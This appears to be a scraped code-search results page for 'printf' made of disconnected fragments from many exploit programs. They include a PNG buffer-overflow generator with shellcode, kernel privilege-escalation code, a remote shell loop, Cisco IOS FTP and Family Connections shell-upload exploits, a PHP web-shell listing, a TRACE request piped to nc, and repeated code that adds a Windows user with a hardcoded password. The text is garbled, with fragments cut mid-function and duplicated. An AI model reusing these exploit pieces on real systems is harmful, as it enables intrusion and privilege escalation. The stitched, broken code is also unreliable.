| New User, Welcome! Login |
Next Page >>
printf
void print_data ( unsigned int , char * , unsigned int );
int main ( void )
{
/* message for users */
printf ( "\n*********** vpdumper.exe ***********" );
printf ( "\nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
printf ( "\nCore Security Technologies, Buenos Aires, Argentina (
2010 )\n" );
/* Search and Print leaked memory */
}
void print_digest(unsigned char *digest) {
unsigned char string[32];
digest_to_string(digest, string);
printf("%s\n", string);
}
/* http://www.faqs.org/rfcs/rfc2104.html */
void hmac_md5(unsigned char *text, int text_len, unsigned char *key, int
key_len, unsigned char *digest) {
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
char Shellcodebuilt[1000];
char *MyShellcode;
int offset=0;
int i=0;
printf("[+] .PNG File Buffer Overflow\n");
printf("[+] Coded and discovered by eidelweiss <eidelweiss@cyberservices.com>\n");
printf("[+] Generated PNG file will work for:\n\WinSoftMagic Photo Editor 2009\n\n");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.png>\n",argv[0]);
printf("[+] Mode is 0 -> run calc.exe\n");
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> if (ret == 0) {
> fscanf(f, "%s\n", sname);
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
char *pattern;
int ret;
pattern = "\xe8\xc7\x6f\xff\xff"; /* Pattern of the code to search */
EscalatePrivileges ();
printf( "finding shellcode...\n" );
for( pos=0x80000000; pos<0xfffff000; pos=pos+0x1000 )
{
ret = ReadKernelMemory( (void*) (pos+0x0ea), (void*) buffer, 5 ); /*
Read the complete block */
#define Send(str) send(sock, (str), strlen(str), 0)
void fdsh(int sock)
{
printf("[+] Sent payload...\n");
sleep(1);
Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
>> struct sockaddr_in addr;
>> struct sock_fprog fprog;
>> struct sock_filter filters[5];
>>
>> if (argc != 2) {
>> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>> return -1;
>> }
>>
>> val = atoi(argv[1]);
>>
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
> struct sockaddr_in addr;
> struct sock_fprog fprog;
> struct sock_filter filters[5];
>
> if (argc != 2) {
> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
> return -1;
> }
>
> val = atoi(argv[1]);
>
struct sockaddr_in addr;
struct sock_fprog fprog;
struct sock_filter filters[5];
if (argc != 2) {
printf("[*] Usage: %s offset (0-63)\n", argv[0]);
return -1;
}
val = atoi(argv[1]);
struct sockaddr_in servaddr;
int s;
if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
}
low = ( ctx->total[0] << 3 );
PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );
//for(int i=0;i<8;i++) printf("length %d\n",msglen[i]);
last = ctx->total[0] & 0x3F;
padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );
md5_update( ctx, md5_padding, padn );
>>> struct sockaddr_in addr;
>>> struct sock_fprog fprog;
>>> struct sock_filter filters[5];
>>>
>>> if (argc != 2) {
>>> printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>>> return -1;
>>> }
>>>
>>> val = atoi(argv[1]);
>>>
}
void usage(char *bn) {
printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
"Author: Salvatore \"drosophila\" Fresta\n\n"
"usage: %s <server> <path> <username> <password>\n"
"example: %s localhost /fcms/ admin 123456\n\n", bn, bn);
}
struct sockaddr_in servaddr;
int s;
if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
}
for (n=l-1;n>=0;n--) {
read_reg (f,n,&a);
read_reg (f,n+1,&b);
r = expmod (a.base,e,m);
if (r != 1) {
printf ("reverse\texp = %I64i\r\n",a.exp);
e *= a.exp;
}
}
fclose (f);
}
c='A';
y=1;
z=0x7FFE0030;
while ((ret==0) && (c<='Z'))
{
sprintf(str, "%c", c);
ret=rmemcmp(conn, z, str, y);
c++;
}
HHOOK hook;
/* Resolving the KiUserCallbackDispatcher address */
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
"ntdll.dll" ) , "KiUserCallbackDispatcher" );
printf ( "%x\n" , KiUserCallbackDispatcher );
/* Changing the privileges */
VirtualProtect ( KiUserCallbackDispatcher , 1 ,
PAGE_EXECUTE_READWRITE , &oldp );
Here it is a PoC using a Google's IP for the testing purposes, but the
same behavior would be exhibited by the victim proxy with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
char number[10000];
int a,b;
printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
return 0;
}
# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password
\"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );
system( szCmdLine );
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- - Written: 01.03.2008
- - Public: 20.03.2008
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
Next Page>>
|
|
|
